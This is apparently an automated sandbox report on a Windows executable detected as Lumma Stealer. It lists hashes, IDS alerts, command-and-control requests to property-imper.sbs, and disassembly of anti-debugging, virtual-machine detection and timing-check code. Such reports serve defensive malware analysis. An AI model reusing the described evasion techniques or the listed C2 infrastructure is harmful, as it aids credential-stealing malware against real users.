
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561818
MD5: c7ffd9f68af166bc332ad19be70c3b5c
SHA1: e19af1c281e963bdb378dd17b84706c51a87bb19
SHA256: 0b2957e10a9d6c29a680e112571ea46be5fedeac0ecc6f0097337f40d61a4cb1
Tags: exe, user-Bitsight
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1644 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C7FFD9F68AF166BC332AD19BE70C3B5C)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):

2024-11-24T11:33:27.539212+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 172.67.162.84 | 443 | TCP
2024-11-24T11:33:29.516196+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 172.67.162.84 | 443 | TCP
2024-11-24T11:33:28.262223+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49705 | 172.67.162.84 | 443 | TCP
2024-11-24T11:33:28.262223+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49705 | 172.67.162.84 | 443 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx | 0_2_00FEBC9D
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [eax], bl | 0_2_00FECF05
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+14h] | 0_2_00FE98F0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h] | 0_2_00FEE0D8
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov ecx, eax | 0_2_00FEC02B
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh | 0_2_0101C040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh | 0_2_0101C040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h | 0_2_0101C040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh | 0_2_0101C040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then push eax | 0_2_0101B860
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [ebx], al | 0_2_01000870
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx+14h] | 0_2_00FEE970
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then push eax | 0_2_0101F8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edi, eax | 0_2_0101F8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, eax | 0_2_0101B8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx | 0_2_0101B8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [esi], cx | 0_2_00FEEA38
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-65h] | 0_2_00FEE35B
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ebp | 0_2_00FE5C90
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ebp | 0_2_00FE5C90
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_01008CB0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h | 0_2_0101BCE0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx] | 0_2_00FEAD00
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch] | 0_2_01020F60
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h] | 0_2_00FE77D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax | 0_2_00FE77D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [edi] | 0_2_01005E90

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 172.67.162.84:443
Source: Joe Sandbox View | IP Address: 172.67.162.84
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 172.67.162.84:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 172.67.162.84:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: property-imper.sbs
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: property-imper.sbs
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: property-imper.sbs
Source: file.exe, 00000000.00000002.1576433185.0000000001B8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1574657240.0000000001B8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m8
Source: file.exe, 00000000.00000003.1574365474.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576727210.0000000001B97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/
Source: file.exe, 00000000.00000003.1574365474.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576727210.0000000001B97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/Q
Source: file.exe, 00000000.00000002.1576433185.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576433185.0000000001B43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576433185.0000000001ADE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/api
Source: file.exe, 00000000.00000002.1576433185.0000000001ADE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/apiS
Source: file.exe, 00000000.00000003.1574365474.0000000001B97000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1576727210.0000000001B97000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/q
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | HTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.8:49705 version: TLS 1.2

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9992699795081967
Source: file.exe | Static PE information: Section: fwtvsnnj ZLIB complexity 0.9945599099864131
Source: classification engine | Classification label: mal100.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010127B0 CoCreateInstance, | 0_2_010127B0
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: file.exe | Static file information: File size 1867776 > 1048576
Source: file.exe | Static PE information: Raw size of fwtvsnnj is bigger than: 0x100000 < 0x19e000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.fe0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fwtvsnnj:EW;vcdokcsv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fwtvsnnj:EW;vcdokcsv:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1ccef5 should be: 0x1d6134
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: fwtvsnnj
Source: file.exe | Static PE information: section name: vcdokcsv
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0104B179 push edi; mov dword ptr [esp], ecx | 0_2_0104B18F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0104B179 push 63B035C0h; mov dword ptr [esp], ecx | 0_2_0104B1F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0104B179 push 6AF25632h; mov dword ptr [esp], eax | 0_2_0104B29D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0104B179 push 2B666A9Ch; mov dword ptr [esp], ecx | 0_2_0104B30B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push ebx; mov dword ptr [esp], edi | 0_2_011A1983
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push eax; mov dword ptr [esp], 5B79F75Ah | 0_2_011A19DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push 5C3D0EA0h; mov dword ptr [esp], edi | 0_2_011A19FB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push 17CAFFE1h; mov dword ptr [esp], esi | 0_2_011A1A5E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push ebx; mov dword ptr [esp], eax | 0_2_011A1B37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push 36DB771Bh; mov dword ptr [esp], ebx | 0_2_011A1B4C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push eax; mov dword ptr [esp], ebx | 0_2_011A1BE8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push 53139CA7h; mov dword ptr [esp], ecx | 0_2_011A1C54
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push edi; mov dword ptr [esp], esi | 0_2_011A1CDD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push 3EBD3286h; mov dword ptr [esp], ebp | 0_2_011A1D4D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push esi; mov dword ptr [esp], 55DFC73Bh | 0_2_011A1D7C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push eax; mov dword ptr [esp], ebx | 0_2_011A1DA2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push 6CCF596Eh; mov dword ptr [esp], ecx | 0_2_011A1DAA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push 6C3D16EAh; mov dword ptr [esp], ecx | 0_2_011A1DE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push 700761F3h; mov dword ptr [esp], ebx | 0_2_011A1E7B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push ecx; mov dword ptr [esp], ebx | 0_2_011A1E9C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push ebp; mov dword ptr [esp], ecx | 0_2_011A1EB1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push ebp; mov dword ptr [esp], 5BDD07BCh | 0_2_011A1EB5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push 27DC5529h; mov dword ptr [esp], edi | 0_2_011A1EE5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push ebx; mov dword ptr [esp], ecx | 0_2_011A1F26
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push ebp; mov dword ptr [esp], eax | 0_2_011A1FE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push edx; mov dword ptr [esp], ebx | 0_2_011A1FFD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push ecx; mov dword ptr [esp], 7D765F1Ah | 0_2_011A2001
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push edi; mov dword ptr [esp], 2DB3F096h | 0_2_011A2018
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push 19FE5A3Ch; mov dword ptr [esp], ebx | 0_2_011A203C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push edi; mov dword ptr [esp], edx | 0_2_011A2078
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_011A1964 push ebx; mov dword ptr [esp], edx | 0_2_011A208D
Source: file.exe | Static PE information: section name: entropy: 7.982113095110462
Source: file.exe | Static PE information: section name: fwtvsnnj entropy: 7.953020845003473

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 103C9D1 second address: 103C9D6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BCECA second address: 11BCEE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c push edx 0x0000000d jns 00007F9668C559D6h 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BCEE2 second address: 11BCEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BCEE8 second address: 11BCEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AEB35 second address: 11AEB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AEB3E second address: 11AEB42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AEB42 second address: 11AEB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9668BCCCCDh 0x0000000b popad 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11AEB5A second address: 11AEB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BE8C7 second address: 11BE8FC instructions: 0x00000000 rdtsc 0x00000002 js 00007F9668BCCCC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 js 00007F9668BCCCC6h 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jbe 00007F9668BCCCD1h 0x00000028 jmp 00007F9668BCCCCBh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BE8FC second address: 103C9D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9668C559E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a movsx ecx, bx 0x0000000d push dword ptr [ebp+122D1731h] 0x00000013 jbe 00007F9668C559DCh 0x00000019 mov dword ptr [ebp+122D278Ch], eax 0x0000001f call dword ptr [ebp+122D2780h] 0x00000025 pushad 0x00000026 pushad 0x00000027 pushad 0x00000028 or di, 6651h 0x0000002d xor dword ptr [ebp+122D1D7Ah], ebx 0x00000033 popad 0x00000034 mov esi, dword ptr [ebp+122D3678h] 0x0000003a popad 0x0000003b xor eax, eax 0x0000003d stc 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 jbe 00007F9668C559E2h 0x00000048 jbe 00007F9668C559DCh 0x0000004e mov dword ptr [ebp+122D3640h], eax 0x00000054 jo 00007F9668C559EDh 0x0000005a jp 00007F9668C559E7h 0x00000060 mov esi, 0000003Ch 0x00000065 jg 00007F9668C559E2h 0x0000006b jp 00007F9668C559DCh 0x00000071 add esi, dword ptr [esp+24h] 0x00000075 cld 0x00000076 lodsw 0x00000078 jmp 00007F9668C559E2h 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 pushad 0x00000082 add dword ptr [ebp+122D1D86h], ebx 0x00000088 popad 0x00000089 mov ebx, dword ptr [esp+24h] 0x0000008d jnp 00007F9668C559ECh 0x00000093 jmp 00007F9668C559E6h 0x00000098 nop 0x00000099 push eax 0x0000009a push edx 0x0000009b jmp 00007F9668C559DEh 0x000000a0 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BE950 second address: 11BEA03 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9668BCCCDEh 0x00000008 jmp 00007F9668BCCCD8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F9668BCCCCEh 0x00000015 nop 0x00000016 mov ecx, dword ptr [ebp+122D3644h] 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D1E0Ah], eax 0x00000024 push 4A054E08h 0x00000029 pushad 0x0000002a pushad 0x0000002b push eax 0x0000002c pop eax 0x0000002d jmp 00007F9668BCCCD0h 0x00000032 popad 0x00000033 js 00007F9668BCCCD5h 0x00000039 popad 0x0000003a xor dword ptr [esp], 4A054E88h 0x00000041 movsx edx, ax 0x00000044 push 00000003h 0x00000046 jmp 00007F9668BCCCCFh 0x0000004b mov cx, bx 0x0000004e push 00000000h 0x00000050 or dword ptr [ebp+122D270Bh], edx 0x00000056 push 00000003h 0x00000058 mov edi, dword ptr [ebp+122D35DCh] 0x0000005e mov dword ptr [ebp+122D1C1Fh], eax 0x00000064 push D52EB831h 0x00000069 push eax 0x0000006a push edx 0x0000006b push ebx 0x0000006c js 00007F9668BCCCC6h 0x00000072 pop ebx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BEA03 second address: 11BEA08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BEA08 second address: 11BEA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 152EB831h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F9668BCCCC8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+124557BCh] 0x00000030 jmp 00007F9668BCCCD2h 0x00000035 push esi 0x00000036 mov edx, dword ptr [ebp+122D19FCh] 0x0000003c pop ecx 0x0000003d push eax 0x0000003e push ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F9668BCCCD3h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BEBFD second address: 11BEC03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BECD6 second address: 11BED05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dx, cx 0x0000000b mov dword ptr [ebp+122D34CDh], ebx 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D3718h] 0x00000019 push E669A1A9h 0x0000001e pushad 0x0000001f jc 00007F9668BCCCCCh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11BED05 second address: 11BED09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11DFCAA second address: 11DFCD3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F9668BCCCCEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F9668BCCCD2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11DE140 second address: 11DE160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9668C559DBh 0x0000000c jmp 00007F9668C559DEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11DE160 second address: 11DE164 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11DE529 second address: 11DE533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9668C559D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11DE533 second address: 11DE537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11DE537 second address: 11DE543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9668C559D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11DE543 second address: 11DE549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11DE549 second address: 11DE54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 11DE6EE second address: 11DE6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
